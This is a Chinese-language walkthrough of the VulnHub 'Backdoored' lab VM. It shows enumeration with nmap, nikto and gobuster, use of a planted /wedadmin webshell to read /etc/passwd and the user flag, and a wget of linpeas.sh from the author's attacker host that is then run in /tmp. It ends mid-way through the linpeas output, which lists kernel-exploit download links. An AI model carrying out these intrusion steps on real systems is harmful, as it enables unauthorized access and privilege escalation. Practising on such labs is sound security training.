Backdoored
识别目标主机IP地址
把目标主机导入VirtualBox后,发现Kali Linux扫描不到目标主机的IP地址,因此需要首先解决没有自动获得IP地址的问题,解决过程见【靶机攻略】相应文章。
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.62.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3b:d5:03 1 60 PCS Systemtechnik GmbH
192.168.56.155 08:00:27:3c:76:0d 1 60 PCS Systemtechnik GmbH h1
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.155
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.155 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-06 21:43 EST
Nmap scan report for bogon (192.168.56.155)
Host is up (0.000088s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
1337/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: backdoored VM
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3C:76:0D (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.59 seconds
目标主机仅有一个端口开放:1337,运行http服务。
Get Access
──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ curl http://192.168.56.155:1337
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>backdoored VM</title>
</head>
<body>
<body bgcolor="#000000">
<center>
<font color="#e60000">
<pre>
▀█████████▄ ▄████████ ▄████████ ▄█ ▄█▄ ████████▄ ▄██████▄ ▄██████▄ ▄████████ ▄████████ ████████▄
███ ███ ███ ███ ███ ███ ███ ▄███▀ ███ ▀███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███
███ ███ ███ ███ ███ █▀ ███▐██▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███
▄███▄▄▄██▀ ███ ███ ███ ▄█████▀ ███ ███ ███ ███ ███ ███ ▄███▄▄▄▄██▀ ▄███▄▄▄ ███ ███
▀▀███▀▀▀██▄ ▀███████████ ███ ▀▀█████▄ ███ ███ ███ ███ ███ ███ ▀▀███▀▀▀▀▀ ▀▀███▀▀▀ ███ ███
███ ██▄ ███ ███ ███ █▄ ███▐██▄ ███ ███ ███ ███ ███ ███ ▀███████████ ███ █▄ ███ ███
███ ███ ███ ███ ███ ███ ███ ▀███▄ ███ ▄███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███
▄█████████▀ ███ █▀ ████████▀ ███ ▀█▀ ████████▀ ▀██████▀ ▀██████▀ ███ ███ ██████████ ████████▀
▀ ███ ███
</pre>
<h4>VM Name: backdoored</h4>
<h4>Difficulty: Easy</h4>
<h4>Maker: 0xatom</h4>
<h4>Flags Under: /home/$user/user.txt & /root/root.txt</h4>
<h4>Discord: 0xatom#8707</h4>
<h4>Tip: You can't spawn a root shell, reading the root flag is enough!</h4>
<h4>For any hint feel free to contact me ಠ‿↼</h4>
<font>
</center>
</body>
</html>
这里提示不能拿到root的shell,还需读取到root Flag就可以。
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ curl http://192.168.56.155:1337/robots.txt
base64_string_that_contains_ssh_user_and_password
这里提示base64字符串包含ssh用户名和密码。
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ curl http://192.168.56.155:1337/robots.txt
base64_string_that_contains_ssh_user_and_password
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ nikto -h http://192.168.56.155:1337
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.155
+ Target Hostname: 192.168.56.155
+ Target Port: 1337
+ Start Time: 2022-11-06 21:49:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: aa1, size: 5ac7a11a9b74a, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-06 21:50:10 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ gobuster dir -u http://192.168.56.155:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/06 21:50:37 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 281]
Progress: 220464 / 220561 (99.96%)===============================================================
2022/11/06 21:51:03 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ gobuster dir -u http://192.168.56.155:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/06 21:51:50 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/index.html (Status: 200) [Size: 2721]
/robots.txt (Status: 200) [Size: 50]
/.php (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
Progress: 1101539 / 1102805 (99.89%)===============================================================
2022/11/06 21:54:12 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ dirb http://192.168.56.155:1337
]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Nov 6 21:54:33 2022
URL_BASE: http://192.168.56.155:1337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.155:1337/ ----
+ http://192.168.56.155:1337/index.html (CODE:200|SIZE:2721)
+ http://192.168.56.155:1337/robots.txt (CODE:200|SIZE:50)
+ http://192.168.56.155:1337/server-status (CODE:403|SIZE:281)
-----------------
END_TIME: Sun Nov 6 21:54:34 2022
DOWNLOADED: 4612 - FOUND: 3
目录扫描没有发现任何有价值的目录和文件,参考其他人,是字典需要用seclists中的字典:
┌──(kali㉿kali)-[~/Vulnhub/Backdoored]
└─$ gobuster dir -u http://192.168.56.155:1337 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.155:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/06 21:58:26 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 281]
Progress: 18650 / 56165 (33.21%)[ERROR] 2022/11/06 21:58:28 [!] parse "http://192.168.56.155:1337/error\x1f_log": net/url: invalid control character in URL
/wedadmin (Status: 301) [Size: 326] [--> http://192.168.56.155:1337/wedadmin/]
Progress: 52950 / 56165 (94.28%)===============================================================
2022/11/06 21:58:32 Finished
===============================================================
这里也说明字典的重要性。需要尝试多个不同的字典。
访问该目录http://192.168.56.155:1337/wedadmin/,进入了webshell
bob@backdoored
:/var/www/html/wedadmin# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
bob@backdoored
:/var/www/html/wedadmin# uname -a
Linux backdoored 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
bob@backdoored
:/var/www/html/wedadmin# cd /home
bob@backdoored
:/home# ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 9 2020 .
drwxr-xr-x 18 root root 4.0K Aug 9 2020 ..
drwxr-xr-x 2 bob bob 4.0K Aug 9 2020 bob
bob@backdoored
:/home# cd bob
bob@backdoored
:/home/bob# ls -alh
total 28K
drwxr-xr-x 2 bob bob 4.0K Aug 9 2020 .
drwxr-xr-x 3 root root 4.0K Aug 9 2020 ..
-rw------- 1 bob bob 5 Aug 9 2020 .bash_history
-rw-r--r-- 1 bob bob 220 Aug 9 2020 .bash_logout
-rw-r--r-- 1 bob bob 3.5K Aug 9 2020 .bashrc
-rw-r--r-- 1 bob bob 807 Aug 9 2020 .profile
-rw-r--r-- 1 root root 33 Aug 9 2020 user.txt
bob@backdoored
:/home/bob# cat user.txt
46f7e8413056847a0d4905c5af103f56
提权
将linpeas.sh脚本上传至目标站点的/tmp目录,修改权限并执行该脚本。
bob@backdoored
:/tmp# wget http://192.168.56.137:8000/linpeas.sh
--2022-11-07 06:04:58-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
0K .......... .......... .......... .......... .......... 6% 79.6M 0s
50K .......... .......... .......... .......... .......... 12% 57.8M 0s
100K .......... .......... .......... .......... .......... 18% 79.9M 0s
150K .......... .......... .......... .......... .......... 24% 64.6M 0s
200K .......... .......... .......... .......... .......... 30% 82.0M 0s
250K .......... .......... .......... .......... .......... 37% 124M 0s
300K .......... .......... .......... .......... .......... 43% 141M 0s
350K .......... .......... .......... .......... .......... 49% 137M 0s
400K .......... .......... .......... .......... .......... 55% 171M 0s
450K .......... .......... .......... .......... .......... 61% 199M 0s
500K .......... .......... .......... .......... .......... 68% 273M 0s
550K .......... .......... .......... .......... .......... 74% 324M 0s
600K .......... .......... .......... .......... .......... 80% 327M 0s
650K .......... .......... .......... .......... .......... 86% 277M 0s
700K .......... .......... .......... .......... .......... 92% 281M 0s
750K .......... .......... .......... .......... .......... 98% 386M 0s
800K ........ 100% 185M=0.006s
2022-11-07 06:04:58 (131 MB/s) - 'linpeas.sh' saved [827827/827827]
bob@backdoored
:/tmp# ls -alh
total 820K
drwxrwxrwt 2 root root 4.0K Nov 7 06:04 .
drwxr-xr-x 18 root root 4.0K Aug 9 2020 ..
-rw-r--r-- 1 bob bob 809K Nov 6 22:04 linpeas.sh
bob@backdoored
:/tmp# chmod +x linpeas.sh
bob@backdoored
:/tmp# ./linpeas.sh
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:12497
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=d09b6d66f3614074a40fdbaece114de6
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
[1;31mPWD[0m=/tmp
HISTFILE=/dev/null
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [1;31m[CVE-2021-22555] Netfilter heap out-of-bounds write[0m
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[0m/usr/bin/base64
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/wget
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Apr 2 2019 /etc/apache2/sites-available/[1;31m000-default.conf[0m
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Aug 9 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/[1;31m000-default.conf[0m
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 71958 Jul 5 2020 /etc/php/7.3/apache2/[1;31mphp.ini[0m
allow_url_fopen = [1;31mOn[0m
allow_url_include = Off
odbc.allow_persistent = [1;31mOn[0m
ibase.allow_persistent = 1
mysqli.allow_persistent = [1;31mOn[0m
pgsql.allow_persistent = [1;31mOn[0m
-rw-r--r-- 1 root root 71570 Jul 5 2020 /etc/php/7.3/cli/[1;31mphp.ini[0m
allow_url_fopen = [1;31mOn[0m
allow_url_include = Off
odbc.allow_persistent = [1;31mOn[0m
ibase.allow_persistent = 1
mysqli.allow_persistent = [1;31mOn[0m
pgsql.allow_persistent = [1;31mOn[0m
[1;34m╔══════════╣ [1;32mAnalyzing Ldap Files (limit 70)
[0mThe password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Aug 9 2020 /etc/[1;31mldap[0m
[1;34m╔══════════╣ [1;32mSearching ssl/ssh files
[0m[1;31mPermitRootLogin yes[0m
ChallengeResponseAuthentication no
UsePAM yes
[1;34m══╣ [1;32mSome home ssh config file was found
[0m[1;31m/usr/share/openssh/sshd_config[0m
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
[1;34m══╣ [1;32m/etc/hosts.allow file found, trying to read the rules:
[0m/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
[1;31mHost[0m *
SendEnv LANG LC_*
HashKnown[1;31mHost[0ms yes
GSSAPIAuthentication yes
[1;34m╔══════════╣ [1;32mAnalyzing PAM Auth Files (limit 70)
[0mdrwxr-xr-x 2 root root 4096 Aug 9 2020 /etc/[1;31mpam.d[0m
-rw-r--r-- 1 root root 2133 Jan 31 2020 /etc/pam.d/[1;31msshd[0m
[1;34m╔══════════╣ [1;32mAnalyzing Keyring Files (limit 70)
[0mdrwxr-xr-x 2 root root 4096 Aug 9 2020 /usr/share/[1;31mkeyrings[0m
[1;34m╔══════════╣ [1;32mSearching uncommon passwd files (splunk)
[0mpasswd file: [1;31m/etc/pam.d/passwd[0m
passwd file: [1;31m/etc/passwd[0m
passwd file: [1;31m/usr/share/bash-completion/completions/passwd[0m
passwd file: [1;31m/usr/share/lintian/overrides/passwd[0m
[1;34m╔══════════╣ [1;32mAnalyzing PGP-GPG Files (limit 70)
[0m[1;90mgpg Not Found
[0m[1;90mnetpgpkeys Not Found
[0m[1;90mnetpgp Not Found
[0m
-rw-r--r-- 1 root root 8132 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 8141 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 2332 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-buster-stable[1;31m.gpg[0m
-rw-r--r-- 1 root root 5106 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 5115 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 2763 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable[1;31m.gpg[0m
-rw-r--r-- 1 root root 7443 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 7452 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 2263 Apr 23 2019 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable[1;31m.gpg[0m
-rw-r--r-- 1 root root 8132 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 8141 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-security-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 2332 Apr 23 2019 /usr/share/keyrings/debian-archive-buster-stable[1;31m.gpg[0m
-rw-r--r-- 1 root root 5106 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 5115 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-security-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 2763 Apr 23 2019 /usr/share/keyrings/debian-archive-jessie-stable[1;31m.gpg[0m
-rw-r--r-- 1 root root 48747 Apr 23 2019 /usr/share/keyrings/debian-archive-keyring[1;31m.gpg[0m
-rw-r--r-- 1 root root 23889 Apr 23 2019 /usr/share/keyrings/debian-archive-removed-keys[1;31m.gpg[0m
-rw-r--r-- 1 root root 7443 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 7452 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-security-automatic[1;31m.gpg[0m
-rw-r--r-- 1 root root 2263 Apr 23 2019 /usr/share/keyrings/debian-archive-stretch-stable[1;31m.gpg[0m
[0m-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin[1;31m/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8[0m
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin[1;31m/chfn ---> SuSE_9.3/10[0m
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin[1;31m/umount ---> BSD/Linux(08-1996)[0m
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin[1;31m/newgrp ---> HP-UX_10.20[0m
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin[1;32m/chsh[0m
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin[1;32m/gpasswd[0m
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin[1;32m/su[0m
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin[1;31m/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)[0m
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh[1;32m/ssh-keysign[0m
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0[1;32m/dbus-daemon-launch-helper[0m
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject[1;32m/dmcrypt-get-device[0m
[1;34m╔══════════╣ [1;32mSGID
[0m[1;34m╚ [1;34m[3mhttps://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
[0m-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin[1;32m/unix_chkpwd[0m
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin[1;32m/wall[0m
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin[1;32m/bsd-write[0m
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin[1;32m/crontab[0m
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin[1;32m/chage[0m
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin[1;32m/ssh-agent[0m
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin[1;32m/expiry[0m
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin[1;32m/dotlockfile[0m
Files with capabilities (limited to 50):
/usr/bin/ping = [1;31mcap_net_raw[0m+ep
/usr/bin/tac = [1;31mcap_dac_read_search[0m+ep
/home/[1;96m[1;31mbob[0m[0m/user.txt
/root/
/var/www
/var/www/html
/var/www/html/robots.txt
/var/www/html/wedadmin
/var/www/html/wedadmin/index.php
/var/www/html/index.html.save
/var/www/html/index.html
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
[1;34m╔══════════╣ [1;32mFiles inside /home/bob (limit 20)
[0mtotal 28
drwxr-xr-x 2 bob bob 4096 Aug 9 2020 .
drwxr-xr-x 3 root root 4096 Aug 9 2020 ..
-rw------- 1 bob bob 5 Aug 9 2020 .bash_history
-rw-r--r-- 1 bob bob 220 Aug 9 2020 .bash_logout
-rw-r--r-- 1 bob bob 3526 Aug 9 2020 .bashrc
-rw-r--r-- 1 bob bob 807 Aug 9 2020 .profile
-rw-r--r-- 1 root root 33 Aug 9 2020 user.txt
[1;34m╔══════════╣ [1;32mFiles inside others home (limit 20)
[0m/var/www/html/robots.txt
/var/www/html/wedadmin/index.php
/var/www/html/index.html.save
/var/www/html/index.html
[1;34m╔══════════╣ [1;32mSearching installed mail applications
[0m
[1;34m╔══════════╣ [1;32mMails (limit 50)
[0m
[1;34m╔══════════╣ [1;32mBackup files (limited 100)
[0m-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog[1;31m.old[0m.gz
-rw-r--r-- 1 root root 363752 Apr 30 2018 /usr/share/doc/manpages/Changes[1;31m.old[0m.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README[1;31m.old[0m.gz
-rw-r--r-- 1 root root 9716 Jun 7 2020 /usr/lib/modules/4.19.0-9-amd64/kernel/drivers/net/team/team_mode_active[1;31mbackup[0m.ko
-rw-r--r-- 1 root root 9716 Jul 24 2020 /usr/lib/modules/4.19.0-10-amd64/kernel/drivers/net/team/team_mode_active[1;31mbackup[0m.ko
[1;34m╔══════════╣ [1;32mWeb files?(output limit)
[0m/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Aug 9 2020 .
drwxr-xr-x 12 root root 4.0K Aug 9 2020 ..
drwxr-xr-x 3 root root 4.0K Aug 9 2020 html
/var/www/html:
total 20K
drwxr-xr-x 3 root root 4.0K Aug 9 2020 .
drwxr-xr-x 3 root root 4.0K Aug 9 2020 ..
[1;34m╔══════════╣ [1;32mAll hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
[0m-rw------- 1 root root 0 Aug 9 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 18 2019 /etc/skel/.bash_logout
-rw-r--r-- 1 bob bob 220 Aug 9 2020 /home/bob/.bash_logout
-rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root root 0 Nov 7 05:32 /run/network/.ifstate.lock
[1;34m╔══════════╣ [1;32mReadable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
[0m-rwxr-xr-x 1 bob bob 827827 Nov 6 22:04 /tmp/linpeas.sh
-rw-r--r-- 1 root root 8987 Aug 9 2020 /var/backups/apt.extended_states.0
[1;34m╔══════════╣ [1;32mInteresting writable files owned by me or writable by everyone (not in Home) (max 500)
[0m[1;34m╚ [1;34m[3mhttps://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
[0m/dev/mqueue
/dev/shm
/home/bob
/run/lock
/tmp
/tmp/linpeas[1;31m.sh[0m
/var[1;31m/lib/[0mphp/sessions
/var/tmp
/usr/share/man/man1/systemd-ask-[1;31mpassword[0m.1.gz
/usr/share/man/man1/systemd-tty-ask-[1;31mpassword[0m-agent.1.gz
/usr/share/man/man7/[1;31mcredential[0ms.7.gz
/usr/share/man/man8/systemd-ask-[1;31mpassword[0m-console.path.8.gz
/usr/share/man/man8/systemd-ask-[1;31mpassword[0m-console.service.8.gz
/usr/share/man/man8/systemd-ask-[1;31mpassword[0m-wall.path.8.gz
/usr/share/man/man8/systemd-ask-[1;31mpassword[0m-wall.service.8.gz
#)[3mThere are more creds/passwds files in the previous parent folder[0m
/usr/share/pam/common-[1;31mpassword[0m.md5sums
/var/cache/debconf/[1;31mpassword[0ms.dat
/var/lib/pam/[1;31mpassword[0m
[1;34m╔══════════╣ [1;32mChecking for TTY (sudo/su) passwords in audit logs
[0m
[1;34m╔══════════╣ [1;32mSearching passwords inside logs (limit 70)
[0m2020-08-09 21:58:45 configure base-[1;31mpassw[0md:amd64 3.5.46 3.5.46
2020-08-09 21:58:45 install base-[1;31mpassw[0md:amd64 <none> 3.5.46
2020-08-09 21:58:45 status half-configured base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:45 status half-installed base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:45 status installed base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:45 status unpacked base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:51 status half-configured base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:51 status half-installed base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:51 status unpacked base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:51 upgrade base-[1;31mpassw[0md:amd64 3.5.46 3.5.46
2020-08-09 21:58:54 install [1;31mpassw[0md:amd64 <none> 1:4.5-1.1
2020-08-09 21:58:54 status half-installed [1;31mpassw[0md:amd64 1:4.5-1.1
2020-08-09 21:58:54 status unpacked [1;31mpassw[0md:amd64 1:4.5-1.1
2020-08-09 21:58:56 configure base-[1;31mpassw[0md:amd64 3.5.46 <none>
2020-08-09 21:58:56 status half-configured base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:56 status installed base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:56 status unpacked base-[1;31mpassw[0md:amd64 3.5.46
2020-08-09 21:58:57 configure [1;31mpassw[0md:amd64 1:4.5-1.1 <none>
2020-08-09 21:58:57 status half-configured [1;31mpassw[0md:amd64 1:4.5-1.1
